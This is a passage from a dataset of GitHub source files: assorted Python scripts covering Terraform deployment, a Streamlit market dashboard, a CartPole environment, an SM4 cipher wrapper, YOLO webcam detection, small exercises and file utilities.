logging.error(\"workspace doesn't exist\")\n sys.exit(-1)\n\n return_code, stdout, stderr = terraform.cmd(\n \"destroy\",\n var={\n \"profile\": profile,\n \"region\": region\n },\n auto_approve=IsFlagged,\n )\n logging.info(stdout)\n logging.error(stderr)\n\n # docker remove\n if return_code == 0:\n logging.info(f\"ECS Stack tstack destroy complete\")\n \n\ndef parse_args() -> argparse.Namespace:\n \"\"\"\n Parse input args from the user into system args\n :return: Namespace of options\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-p\",\n \"--profile\",\n type=str,\n required=True,\n default=\"default\",\n help=\"The aws profile you're going to use\"\n )\n parser.add_argument(\n \"-t\",\n \"--type\",\n type=str,\n default=\"run\",\n choices=[\"image\"],\n required=False,\n help=\"\"\"options of to do\n run - will build terraform\n delete - will destroy stacks and rmi docker images\n image - will build the image\n \"\"\"\n )\n parser.add_argument(\n \"-r\",\n \"--region\",\n type=str,\n default=\"us-east-1\",\n required=False,\n help=\"This is the aws region you are using. default is us-east-1\"\n )\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n \n # simple two state run\n if args.type == \"run\":\n # apply terrafrom\n create_terrafrom(args.profile, args.region)\n elif args.type == \"image\":\n # build docker image and push to ecr\n create_docker_images_and_push(args.profile, args.region)\n elif args.type == \"clean\":\n clean_up(args.profile, args.region)\n else:\n logging.error(\"Error - invalid selection\")\n","repo_name":"jchamish/nginx-ha-ipaddress","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"26654328357","text":"import pandas as pd\r\nimport streamlit as st\r\nimport numpy as np\r\n\r\n\r\ndef get_avg_price(market_metrics):\r\n avg_prices = market_metrics.groupby('market_id',as_index=False)['median_sale_price'].mean()\r\n return avg_prices\r\n\r\n\r\ndef max_score(score,mid,maxscore,maxid):\r\n st.header(\"Market Hotness Calculator\")\r\n st.text(\"Graph for the Avg sales price and their corresponding market_id\")\r\n st.line_chart(pd.DataFrame(score,mid))\r\n st.text(f\"The max sales {maxscore} has been done by the market id {maxid}\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n\r\n\r\n\r\ndef avg_sales(score,mid,city,mdi):\r\n\r\n st.text(\"The below score is based on Average of the Sales after buying it\")\r\n try:\r\n market_id=st.number_input('Enter the Market ID to get the score')\r\n ind=mid.index(int(market_id))\r\n cind=mdi.index(int(market_id))\r\n st.text(f\"The score is: {score[ind]} and the city where it belongs is {city[cind]}\")\r\n except:\r\n st.warning(\"Sorry, Enter correct Market id\")\r\n\r\n\r\nmarket=pd.read_csv(\"market.csv\")\r\nmarket_metrics=pd.read_csv(\"market_metrics.csv\")\r\nmarket_id=market_metrics.groupby('market_id').count().reset_index()\r\n\r\n\r\n# Removing null values from market dataframe\r\nmarket_nan = market.isnull().sum().sum()\r\nmarket=market.dropna()\r\n\r\n\r\n# Removing the null values and filling missing data present in the market metrics dataframe\r\nmetric_nan = market_metrics['median_list_price_psqft'].isnull().sum().sum()\r\npending_housedata=market_metrics[market_metrics[\"days_to_pending\"].isna() & market_metrics[\"days_to_sell\"].isna()]\r\npending_housedata=pending_housedata[pending_housedata[\"sold_homes_count\"]<5]\r\npending_housedata=pending_housedata[pending_housedata[\"new_listings_count\"]<10]\r\nindices=list(pending_housedata.index)\r\nmetrics=market_metrics.drop(indices)\r\nmetrics.days_to_pending.fillna(metrics.days_to_sell, inplace=True)\r\nmetrics.days_to_sell.fillna(metrics.days_to_pending, inplace=True)\r\n\r\n\r\n# This block is for calculating the avg price score\r\navg_price=get_avg_price(metrics)\r\nprice=pd.DataFrame(avg_price)\r\nscore=list(price[\"median_sale_price\"])\r\nmid=list(price[\"market_id\"])\r\n\r\ncity=list(market['city'])\r\nmdi=list(market['id'])\r\n\r\nmaxscore=max(score)\r\nind=score.index(maxscore)\r\nmaxind=mid[ind]\r\nmax_score(score,mid,maxscore,maxind)\r\navg_sales(score,mid,city,mdi)\r\n\r\n\r\n# This block is for calculating the days of sold\r\n\r\ndef get_avg_day(market_metrics):\r\n avg_prices = market_metrics.groupby('market_id',as_index=False)['days_to_sell'].mean()\r\n return avg_prices\r\n\r\n\r\ndef average_day(score2,mid2,city2,mdi2):\r\n\r\n st.text(\"The below score is based on Average of the the days to sell\")\r\n try:\r\n marid=st.number_input('Enter the Market ID to get the score')\r\n ind=mid2.index(int(marid))\r\n cind=mdi2.index(int(marid))\r\n st.text(f\"The score is: {score2[ind]} and the city where it belongs is {city2[cind]}\")\r\n except:\r\n st.warning(\"Sorry, Enter correct Market id\")\r\n\r\n\r\ndef day_score(score2,mid2,maxscore2,maxid2):\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.text(\"Graph for the Avg days to sell and their corresponding market_id\")\r\n st.line_chart(pd.DataFrame(score2,mid2))\r\n st.text(f\"The max sales {maxscore2} has been done by the market id {maxid2}\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n\r\n\r\navg_day=get_avg_day(metrics)\r\nprice2=pd.DataFrame(avg_day)\r\nscore2=list(price2[\"days_to_sell\"])\r\nmid2=list(price2[\"market_id\"])\r\n\r\ncity2=list(market['city'])\r\nmdi2=list(market['id'])\r\n\r\nmaxscore2=max(score2)\r\nind2=score2.index(maxscore2)\r\nmaxind2=mid2[ind2]\r\nday_score(score2,mid2,maxscore2,maxind2)\r\naverage_day(score2,mid2,city2,mdi2)\r\n\r\n#print(score2)\r\n","repo_name":"NavinAananthan/ZeroDown-Hackathon","sub_path":"algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"35469810871","text":"import csv\nfrom excep import excep as ex\nfrom user_interface import user_interface as console\n\n\ndef read_data(path): #Функция, читает данные из файла в список\n \n ex.read_file_except(path)\n with open(path, \"r\") as file:\n reader = csv.reader(file)\n data_list = []\n for row in reader:\n data_list.append(row)\n return data_list\n\t\t\t\n\ndef show_all(path): #Функция, выводит все заметки из указанного .csv файла.\n\n\tlist_ = read_data(path)\n\t\n\tprint('''\\t ID || Имя || Вид ''')\n\tprint('=' * 50)\n\tfor note in list_:\n\t\tprint(f'\\t {note[0]}. || {note[1]} || {note[2]} \\n \\n Список изученных команд: {note[3]}' )\n\tprint('=' * 50)\n\n\ndef selected_filter():\n while (True):\n console.choise_search_filter()\n k = ex.action('пункт')\n if k == \"1\": \n print('-'*50)\n print('Вы выбрали \"По идентификатору\"')\n print('-'*50)\n return 0\n # show_selected_note(path, 0)\n\n elif k == \"2\": \n print('-'*50)\n print('Вы выбрали \"По имени\"')\n print('-'*50)\n return 1\n # show_selected_note(path, 1)\n \n elif k == \"3\": \n print('-'*50)\n print('Вы выбрали \"По виду\"')\n print('-'*50)\n return 2\n # show_selected_note(path, 2) \n\n elif k == \"4\":\n print('-'*50)\n print(\"Производиться выход в главное меню\")\n print('-'*50)\n break\n \n else:\n print('-'*50)\n print(\"Вы ввели неправильные данные\")\n print('-'*50)\n\ndef show_selected_note(path, x):\n\t'''\n\tФункция, выводит информацию о заметках по указанным данным\n\t'''\n \n\tlist_note = read_data(path)\n\tsearch_filter = ex.check_input_string('Введите параметры поиска: ')\n\tfor note in list_note:\n\t\tif search_filter == note[x] in note:\n\t\t\tindex = list_note.index(note)\n\t\t\tprint(list_note[index])\n \n\n \n ","repo_name":"Marassanovad/FinalProject","sub_path":"python/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"25763521533","text":"# Write a Python program to create a dictionary of phone numbers and names of five persons. Display the cointents of the dictionary in alphabetical order of names \nph={}\ni=0\nwhile(i<5):\n key = input() \n value = input() \n ph[key] = value\n i=i+1\n\n\n \nsorted_keys = ph.items()\nnew_values = sorted(sorted_keys)\nprint(new_values)","repo_name":"JK432/Dictionary-of-phone-numbers","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"32146170496","text":"import os\nimport cv2\nfrom tqdm import tqdm\nfrom pathlib import Path\n\n\ndef vid2frames(vid_file, save_folder, prefix=\"{:03d}.jpg\"):\n vidcap = cv2.VideoCapture(vid_file)\n success, image = vidcap.read()\n count = 1\n success = True\n while success:\n cv2.imwrite(os.path.join(save_folder, prefix.format(count)),\n image) # save frame as JPEG file\n count += 1\n success, image = vidcap.read()\n\n\nif __name__ == '__main__':\n video_files = sorted(Path(\"dataset/videos/videos\").glob(\"*.mp4\"))\n save_top_folder = Path(\"dataset/videos/frames/\")\n\n if not save_top_folder.exists():\n os.mkdir(str(save_top_folder))\n\n for video_file in tqdm(video_files, desc=\"Number of videos\"):\n save_vid_folder = save_top_folder / video_file.stem\n if not save_vid_folder.exists():\n os.mkdir(save_vid_folder)\n\n if not any(save_vid_folder.iterdir()):\n vid2frames(str(video_file), str(save_vid_folder))\n","repo_name":"hgupta01/Weather_Intensity_Recognition","sub_path":"varg_video2frames.py","file_name":"varg_video2frames.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"34525147398","text":"from collections import deque\n\nn = int(input())\ns = deque([input() for _ in range(n)])\nhistory = {}\n\nfor i in range(n):\n query = s.popleft()\n if(query in history):\n print(query + \"(\" + str(history[query] + 1) +\")\" )\n history[query]+=1\n else:\n print(query)\n history[query]=0\n # print(history)\n","repo_name":"kibutan/Atcoder","sub_path":"ABC261/C - NewFolder(1).py","file_name":"C - NewFolder(1).py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"32636675851","text":"import numpy as np\nimport math\nimport gym\nfrom gym import spaces\nfrom gym.utils import seeding\nfrom os import path\nfrom scipy.integrate import odeint\n\nfrom ..utils import ImageEncoder\nfrom ..gym_wrapper import GymWrapper\n\n__all__ = ['CartPole']\n\nclass GymCartPole(gym.Env):\n metadata = {\n 'render.modes': ['human', 'rgb_array'],\n 'video.frames_per_second': 50\n }\n\n def __init__(self, *args, **kwargs):\n self.gravity = 9.8\n self.masscart = 1.0\n self.masspole = 0.1\n self.total_mass = (self.masspole + self.masscart)\n self.length = 0.5 # actually half the pole's length\n self.polemass_length = (self.masspole * self.length)\n self.max_force = 10.0\n self.tau = 0.02 # seconds between state updates\n\n # Angle at which to fail the episode\n self.theta_threshold_radians = 0.21 #12 * 2 * np.pi / 360\n self.x_threshold = 0.5 #2.4\n\n # Angle limit set to 2 * theta_threshold_radians so failing observation is still within bounds\n high = np.array([\n self.x_threshold * 2,\n np.finfo(np.float32).max,\n self.theta_threshold_radians * 2,\n np.finfo(np.float32).max])\n\n self.action_space = spaces.Box(low=-self.max_force, high=self.max_force, shape=(1,))\n self.observation_space = spaces.Box(-high, high)\n\n self.seed()\n self.viewer = None\n self.state = None\n\n self.steps_beyond_done = None\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def dynamics(self, st, t, u):\n x, x_dot, theta, theta_dot = st\n # force = np.clip(u, -self.max_force, self.max_force)[0]\n force = u[0]\n # print(force, u)\n costheta = np.cos(theta)\n sintheta = np.sin(theta)\n temp = (force + self.polemass_length * theta_dot * theta_dot * sintheta) / self.total_mass\n thetaacc = (self.gravity * sintheta - costheta* temp) / (self.length * (4.0/3.0 - self.masspole * costheta * costheta / self.total_mass))\n xacc = temp - self.polemass_length * thetaacc * costheta / self.total_mass\n # x = x + self.tau * x_dot\n # x_dot = x_dot + self.tau * xacc\n # theta = theta + self.tau * theta_dot\n # theta_dot = theta_dot + self.tau * thetaacc\n dx = x_dot\n dx_dot = xacc\n dtheta = theta_dot\n dtheta_dot = thetaacc\n return np.array([dx, dx_dot, dtheta, dtheta_dot])\n\n def step(self,action):\n #assert self.action_space.contains(action), \"%r (%s) invalid\"%(action, type(action))\n #print (f\"state {self.counter} : {self.state}\")\n self.counter += 1\n state = self.state\n\n x, x_dot, theta, theta_dot = self.state\n cost = x**2 + theta**2 + x_dot**2 + theta_dot**2 + (action[0]**2)\n\n N = 2\n t = np.linspace(0, self.tau, N)\n self.state = odeint(self.dynamics, self.state, t, args=(action, ))[-1, :]\n # print(self.state)\n # print(action)\n # self.state = self.dynamics(state, action)\n x, x_dot, theta, theta_dot = self.state\n\n done = x < -self.x_threshold \\\n or x > self.x_threshold \\\n or x_dot < -self.x_threshold \\\n or x_dot > self.x_threshold \\\n or theta < -self.theta_threshold_radians \\\n or theta > self.theta_threshold_radians \\\n or theta_dot < -self.theta_threshold_radians \\\n or theta_dot > self.theta_threshold_radians\n done = bool(done)\n\n if not done:\n cost = -1.0\n else:\n cost = 1.0\n\n return self.state, -cost, False, {}\n\n def reset(self):\n self.counter = 0\n self.state = self.np_random.uniform(low=-0.05, high=0.05, size=(4,))\n # self.state = np.array([0.05, 0.05, 0.05, 0.05])\n self.steps_beyond_done = None\n return self.state\n\n def render(self, mode='human'):\n # screen_width = 600\n # screen_height = 400\n\n # world_width = self.x_threshold * 2\n # scale = screen_width/world_width\n # carty = 100 # TOP OF CART\n # polewidth = 10.0\n # polelen = scale * (2 * self.length)\n # cartwidth = 50.0\n # cartheight = 30.0\n\n # if self.viewer is None:\n # from gym.envs.classic_control import rendering\n # self.viewer = rendering.Viewer(screen_width, screen_height)\n # l, r, t, b = -cartwidth / 2, cartwidth / 2, cartheight / 2, -cartheight / 2\n # axleoffset = cartheight / 4.0\n # cart = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\n # self.carttrans = rendering.Transform()\n # cart.add_attr(self.carttrans)\n # self.viewer.add_geom(cart)\n # l, r, t, b = -polewidth / 2, polewidth / 2, polelen - polewidth / 2, -polewidth / 2\n # pole = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\n # pole.set_color(.8, .6, .4)\n # self.poletrans = rendering.Transform(translation=(0, axleoffset))\n # pole.add_attr(self.poletrans)\n # pole.add_attr(self.carttrans)\n # self.viewer.add_geom(pole)\n # self.axle = rendering.make_circle(polewidth/2)\n # self.axle.add_attr(self.poletrans)\n # self.axle.add_attr(self.carttrans)\n # self.axle.set_color(.5, .5, .8)\n # self.viewer.add_geom(self.axle)\n # self.track = rendering.Line((0, carty), (screen_width, carty))\n # self.track.set_color(0, 0, 0)\n # self.viewer.add_geom(self.track)\n\n # self._pole_geom = pole\n\n # if self.state is None:\n # return None\n\n # # Edit the pole polygon vertex\n # pole = self._pole_geom\n # l, r, t, b = -polewidth / 2, polewidth / 2, polelen - polewidth / 2, -polewidth / 2\n # pole.v = [(l, b), (l, t), (r, t), (r, b)]\n\n # x = self.state\n # cartx = x[0] * scale + screen_width / 2.0 # MIDDLE OF CART\n # self.carttrans.set_translation(cartx, carty)\n # self.poletrans.set_rotation(-x[2])\n\n # return self.viewer.render(return_rgb_array=mode == 'rgb_array')\n print(self.counter, self.state)\n\n def close(self):\n if self.viewer:\n self.viewer.close()\n self.viewer = None\n\n\nclass CartPole(GymWrapper):\n\n environment_name = 'CartPole'\n entry_point = \"marvelgym.openai.cartpole:GymCartPole\"\n max_episode_steps = 50\n reward_threshold = -3.75 # ignore\n\n def __init__(self, **kwargs):\n config = {\n 'image': kwargs.pop('image', False),\n 'sliding_window': kwargs.pop('sliding_window', 0),\n 'image_dim': kwargs.pop('image_dim', 32),\n }\n super(CartPole, self).__init__(config)\n\n # def cost_fn(self, s, a):\n # x, x_dot, theta, theta_dot = s[:,0], s[:,1], s[:,2], s[:,3]\n # return x**2 + theta**2 + x_dot**2 + theta_dot**2 + (np.squeeze(a)**2)\n\n def torque_matrix(self):\n return 2e-4 * np.eye(self.get_action_dim()) #0.002\n\n def make_summary(self, observations, name):\n pass\n\n def is_image(self):\n return self.image\n\n def image_size(self):\n if self.image:\n return [self.image_dim, self.image_dim, 3]\n return None\n\n def start_recording(self, video_path):\n frame_shape = (800, 1200, 3)\n self.image_encoder = ImageEncoder(video_path, frame_shape, 30)\n\n def grab_frame(self):\n frame = self.render(mode='rgb_array')\n self.image_encoder.capture_frame(frame)\n\n def stop_recording(self):\n self.image_encoder.close()\n\n #specifications\n def training_settings(self):\n return {\n \"dp\": False,\n \"ilqr\": False,\n \"trpo\": True,\n \"training_iters\": 1,\n \"learning_rate\": 0.0001,\n \"train_safe\": True,\n \"train_ind\": True,\n \"train_reach\": False,\n \"train_performance\": False,\n \"lb_start\": np.array([-0.05,-0.05,-0.05,-0.05]),\n \"ub_start\": np.array([ 0.05, 0.05, 0.05, 0.05]),\n \"lb_safe\": np.array([-0.5,-0.5, -0.5, -0.5]),\n \"ub_safe\": np.array([ 0.5, 0.5, 0.5, 0.5]),\n \"lb_reach\": np.array([0., 0., 0., 0.]),\n \"ub_reach\": np.array([0., 0., 0., 0.]),\n \"lb_action\": None,\n \"ub_action\": None,\n \"lb_avoids\": None,\n \"ub_avoids\": None,\n }\n","repo_name":"RU-Automated-Reasoning-Group/VEL","sub_path":"training/marvelgym/openai/cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"9079670664","text":"import typing\nfrom dataclasses import dataclass\n\nfrom tongsuopy.crypto.ciphers import AEADEncryptionContext, Cipher, CipherContext, algorithms, modes\n\nfrom bkcrypto import constants, types\n\nfrom .. import configs\nfrom ..options import SM4SymmetricOptions\nfrom . import base\n\n\n@dataclass\nclass SM4SymmetricRuntimeConfig(configs.BaseSM4SymmetricConfig, base.BaseSymmetricRuntimeConfig):\n\n mode_class: types.SM4ModeClass = None\n\n def __post_init__(self):\n super().__post_init__()\n\n key_sizes: typing.Set[int] = {key_size // 8 for key_size in algorithms.SM4.key_sizes}\n if self.key_size not in key_sizes:\n raise ValueError(f\"Optional key sizes are {key_sizes}, but got {self.key_size}\")\n\n try:\n self.mode_class = {\n constants.SymmetricMode.CTR: modes.CTR,\n constants.SymmetricMode.CBC: modes.CBC,\n constants.SymmetricMode.GCM: modes.GCM,\n constants.SymmetricMode.CFB: modes.CFB,\n }[self.mode]\n\n except KeyError:\n raise ValueError(f\"Unsupported mode: {self.mode}\")\n\n\nclass SM4SymmetricCipher(base.BaseSymmetricCipher):\n\n CIPHER_TYPE: str = constants.SymmetricCipherType.SM4.value\n\n CONFIG_DATA_CLASS: typing.Type[SM4SymmetricRuntimeConfig] = SM4SymmetricRuntimeConfig\n\n OPTIONS_DATA_CLASS: typing.Type[SM4SymmetricOptions] = SM4SymmetricOptions\n\n config: SM4SymmetricRuntimeConfig = None\n\n def __init__(\n self,\n key: typing.Optional[typing.Union[bytes, str]] = None,\n **options,\n ):\n super().__init__(key, **options)\n if self.config.key and len(self.config.key) < self.config.key_size:\n self.config.key += b\"\\x00\" * (self.config.key_size - len(self.config.key))\n\n def get_block_size(self) -> int:\n return algorithms.SM4.block_size // 8\n\n def _encrypt(self, plaintext_bytes: bytes, encryption_metadata: base.EncryptionMetadata) -> bytes:\n\n mode_init_args: typing.List[bytes] = []\n if self.config.enable_iv:\n mode_init_args.append(encryption_metadata.iv)\n cipher: Cipher = Cipher(algorithms.SM4(self.config.key), self.config.mode_class(*mode_init_args))\n cipher_ctx: typing.Union[CipherContext, AEADEncryptionContext] = cipher.encryptor()\n if self.config.enable_aad:\n cipher_ctx.authenticate_additional_data(encryption_metadata.aad)\n ciphertext_bytes: bytes = cipher_ctx.update(plaintext_bytes)\n ciphertext_bytes += cipher_ctx.finalize()\n\n if self.config.mode == constants.SymmetricMode.GCM:\n encryption_metadata.tag = cipher_ctx.tag\n return ciphertext_bytes\n\n def _decrypt(self, ciphertext_bytes: bytes, encryption_metadata: base.EncryptionMetadata) -> bytes:\n\n mode_init_args: typing.List[bytes] = []\n if self.config.enable_iv:\n mode_init_args.append(encryption_metadata.iv)\n if encryption_metadata.tag:\n mode_init_args.append(encryption_metadata.tag)\n\n cipher: Cipher = Cipher(algorithms.SM4(self.config.key), self.config.mode_class(*mode_init_args))\n cipher_ctx: typing.Union[CipherContext, AEADEncryptionContext] = cipher.decryptor()\n if self.config.enable_aad:\n cipher_ctx.authenticate_additional_data(encryption_metadata.aad)\n plaintext_bytes = cipher_ctx.update(ciphertext_bytes)\n plaintext_bytes += cipher_ctx.finalize()\n return plaintext_bytes\n","repo_name":"TencentBlueKing/crypto-python-sdk","sub_path":"bkcrypto/symmetric/ciphers/sm4.py","file_name":"sm4.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"5187168032","text":"from PIL import Image\n\nimport torch\nimport torchvision.transforms.functional as TF\nimport visualpriors\nimport subprocess\nimport cv2\nimport numpy as np\n\nmode = ['autoencoding', 'depth_euclidean']# 'reshading', 'keypoints2d', 'edge_occlusion','curvature', 'edge_texture', 'keypoints3d', 'segment_unsup2d', 'segment_unsup25d','normal','segment_semantic', 'denoising' , 'inpainting',\n # 'class_object',\n # 'jigsaw', 'room_layout','class_scene', 'egomotion', 'nonfixated_pose','fixated_pose', 'point_matching', 'vanishing_point']\ntool = 'cv'\n#not impletemented: 'jigsaw', 'room_layout','class_scene', 'egomotion', 'nonfixated_pose','fixated_pose', 'point_matching', 'vanishing_point'\n# mismatch: 'class_object'\n# \n#'colorization',\n#\n#\n# \n# Download a test image\n# subprocess.call(\"curl -O https://raw.githubusercontent.com/StanfordVL/taskonomy/master/taskbank/assets/test.png\", shell=True)\n\n# Load image and rescale/resize to [-1,1] and 3x256x256\nif tool=='pil':\n image = Image.open('./test/test.png')\n print(type(image))\n x = TF.to_tensor(TF.resize(image, 256)) * 2 - 1\n print(x.dtype)\n print(type(x))\nelse:\n image=cv2.imread('./test/test.png')\n x=torch.from_numpy(image)\n print(x.dtype)\n x = TF.to_tensor(image) * 2 - 1\n # x = x.permute(2,0,1).float()* 2 - 1\n print(x.dtype)\nx = x.unsqueeze_(0)\n\nfor i, m in enumerate(mode):\n\n try:\n representation = visualpriors.representation_transform(x, m, device='cpu')\n print(representation.shape)# torch.Size([1, 8, 16, 16])\n except:\n print(m)\n\n # Transform to normals feature and then visualize the readout\n pred = visualpriors.feature_readout(x, m, device='cpu')\n\n # Save it\n TF.to_pil_image(pred[0] / 2. + 0.5).save('test_{}_readout.png'.format(m))","repo_name":"GELIELEO/attention_on_midlevel","sub_path":"tests/visualpriors_test.py","file_name":"visualpriors_test.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"30383956959","text":"import cv2\r\nimport numpy as np\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\n# Load Yolo\r\nnet = cv2.dnn.readNet(\"/home/kasztp/git/yolov3/yolov3.weights\", \"/home/kasztp/git/yolov3/yolov3.cfg\")\r\nclasses = []\r\nwith open(\"/home/kasztp/git/yolov3/coco.names\", \"r\") as f:\r\n classes = [line.strip() for line in f.readlines()]\r\nlayer_names = net.getLayerNames()\r\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\r\nfont = cv2.FONT_HERSHEY_PLAIN\r\n\r\nwhile(True):\r\n # Capture frame-by-frame\r\n ret, frame = cap.read()\r\n\r\n height,width,channels = frame.shape\r\n # Detecting objects\r\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (416, 416), (0, 0, 0), True, crop=False)\r\n net.setInput(blob)\r\n outs = net.forward(output_layers)\r\n\r\n #Showing info on screen/ get confidence score of algorithm in detecting an object in blob\r\n for out in outs:\r\n for detection in out:\r\n scores = detection[5:]\r\n class_id = np.argmax(scores)\r\n confidence = scores[class_id]\r\n if confidence > 0.5:\r\n #object detected\r\n center_x= int(detection[0]*width)\r\n center_y= int(detection[1]*height)\r\n w = int(detection[2]*width)\r\n h = int(detection[3]*height)\r\n\r\n #rectangle co-ordinaters\r\n x=int(center_x - w/2)\r\n y=int(center_y - h/2)\r\n\r\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,255,255),1)\r\n cv2.putText(frame,classes[class_id],(x,y),font,1,(255,255,255),1) \r\n\r\n # Display the resulting frame\r\n cv2.imshow('frame',frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n# When everything done, release the capture\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"kasztp/yolo-test","sub_path":"yolo1.py","file_name":"yolo1.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"21910752856","text":"#MINHA FORMULA\n\nimport math\n\na=float(input(\"\\nDigite o valor de A:\\n\\n\"))\nb=float(input(\"\\nDigite o valor de B:\\n\\n\"))\nc=float(input(\"\\nDigite o valor de C:\\n\\n\"))\n\nwhile a==0:\n a=float(input(\"O valor de 'a' não pode ser ZERO, por favor digite outro valor:\\n\\n\"))\n\nelse:\n delta=b**2-4*a*c\n print(\"\\n\\nDelta é:\",delta,\"\\n\\n\")\n\n if delta<0:\n print(\"Não tem raiz real.\\n\\n\")\n\n elif delta==0:\n raiz1=(-b+math.sqrt(delta))/(2*a)\n print(\"Tem 1 raiz real.\\n\\n\")\n print(\"A raiz real é:\",raiz1,\"\\n\\n\")\n\n elif delta>0:\n raiz1=(-b+math.sqrt(delta))/(2*a)\n raiz2=(-b-math.sqrt(delta))/(2*a)\n print(\"Tem 2 raizes reais.\\n\\n\")\n print(\"As raizes reais são:\",raiz1,\"\\n\\n\")\n print(\"As raizes reais são:\",raiz2,\"\\n\\n\")\n\n#FORMULA PROFESSOR\n\ndeltaprof = b ** 2 - 4 * a * c\n\nif deltaprof == 0:\n raiz1 =(-b + math.sqrt(deltaprof)) / (2 * a)\n print(\"EQUACAO PROF: A única raiz é: \", raiz1,\"\\n\\n\")\nelse:\n if deltaprof < 0:\n print(\"EQUACAO PROF: A equação não possui raízes reais\\n\\n\")\n else:\n raiz1 = (-b + math.sqrt(deltaprof)) / (2 * a)\n raiz2 = (-b - math.sqrt(deltaprof)) / (2 * a)\n print(\"EQUACAO PROF: A primeira raiz é: \",raiz1,\"\\n\\n\")\n print(\"EQUACAO PROF: A segunda raiz é: \",raiz2,\"\\n\\n\")\n\n","repo_name":"cgsmendes/aulas","sub_path":"if-else-formulabascara.py","file_name":"if-else-formulabascara.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"9067396311","text":"\"\"\"Json serialization utilities.\"\"\"\nfrom __future__ import absolute_import, unicode_literals\n\nimport datetime\nimport decimal\nimport uuid\n\nfrom six import text_type\n\nfrom celery.utils.imports import symbol_by_name\n\ntry:\n from django.utils.functional import Promise as DjangoPromise\nexcept ImportError: # pragma: no cover\n class DjangoPromise(object): # noqa\n pass\n\n__all__ = ['JsonEncoder', 'dumps']\n\n_JSON_EXTRA_ARGS = {\n 'simplejson': {'use_decimal': False},\n}\n\n\ndef get_best_json(attr=None,\n choices=['simplejson', 'json']):\n for i, module in enumerate(choices):\n try:\n sym = ':'.join([module, attr]) if attr else module\n return symbol_by_name(sym), _JSON_EXTRA_ARGS.get(module, {})\n except (AttributeError, ImportError):\n if i + 1 >= len(choices):\n raise\n\n\njson, _json_args = get_best_json()\n\n\nclass JsonEncoder(get_best_json('JSONEncoder')[0]):\n \"\"\"Thorn custom Json encoder.\n\n Notes:\n Same as django.core.serializers.json.JSONEncoder but preserves\n datetime microsecond information.\n \"\"\"\n\n def default(self, o,\n dates=(datetime.datetime, datetime.date),\n times=(datetime.time,),\n textual=(decimal.Decimal, uuid.UUID, DjangoPromise),\n isinstance=isinstance,\n datetime=datetime.datetime,\n text_type=text_type):\n if isinstance(o, dates):\n if not isinstance(o, datetime):\n o = datetime(o.year, o.month, o.day, 0, 0, 0, 0)\n r = o.isoformat()\n if r.endswith(\"+00:00\"):\n r = r[:-6] + \"Z\"\n return r\n elif isinstance(o, times):\n return o.isoformat()\n elif isinstance(o, textual):\n return text_type(o)\n else:\n return super(JsonEncoder, self).default(o)\n\n\ndef dumps(obj, encode=json.dumps, cls=JsonEncoder):\n \"\"\"Serialize object as json string.\"\"\"\n return encode(obj, cls=cls, **_json_args)\n","repo_name":"robinhood/thorn","sub_path":"thorn/utils/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":514,"dataset":"github-code","pt":"35"}
+{"seq_id":"2668443141","text":"\"\"\"Split all files into small parts.\n\"\"\"\nimport gzip\nimport shutil\nimport tempfile\nimport argparse\nimport subprocess\nfrom pathlib import Path\nfrom datetime import datetime as dt\nparser = argparse.ArgumentParser(description=__doc__)\nparser.add_argument(\"-s\", \"--smiles\", nargs='+', required=True)\nparser.add_argument(\"-l\", \"--length\", default=1000000, type=int, help=\"number of lines in each part, default 1,000,000\")\nparser.add_argument(\"-o\", \"--output_dir\", required=True)\nargs = parser.parse_args()\n\n\ndef page_generator_from_files(smiles_files, length):\n page = []\n count = 0\n for smi in smiles_files:\n print(\"{}: loading {}\".format(dt.now(), smi))\n smi = Path(smi)\n if smi.suffix == '.gz':\n f = gzip.open(smi, 'rt')\n else:\n f = open(smi, 'r')\n for i in f:\n if count < length:\n page.append(i)\n count += 1\n else:\n yield page\n page = []\n count = 0\n if page:\n yield page\n\nstart = 